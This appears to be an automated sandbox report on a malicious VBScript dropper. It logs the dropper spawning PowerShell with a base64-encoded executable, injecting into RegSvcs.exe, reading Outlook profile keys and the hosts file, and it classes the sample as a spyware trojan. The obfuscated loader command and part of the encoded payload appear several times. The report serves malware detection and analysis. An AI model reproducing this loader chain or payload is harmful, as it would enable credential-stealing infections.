        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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 to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeJump to behavior
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ilbo13zy.j2f.ps1Jump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winVBS@6/3@3/3
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dllJump to behavior
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5988:120:WilError_01
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\GJ890-1286.vbs"
        Source: wscript.exe, 00000000.00000002.302919745.000001D52AC98000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ;.VBp
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior

        Data Obfuscation

        barindex
        VBScript performs obfuscated calls to suspicious functions
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IWshShell3.Run("powershell.exe [Byte[]] $rOWg = [system.Convert]::FromBase64string('TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAA", "false")
        Suspicious powershell command line found
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" [Byte[]] $rOWg = [system.Convert]::FromBase64string('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 to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05CFCF92 push esp; iretd 3_2_05CFD1CD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05CFF588 pushad ; iretd 3_2_05CFF915
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_05CFED90 pushad ; iretd 3_2_05CFEEBD
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
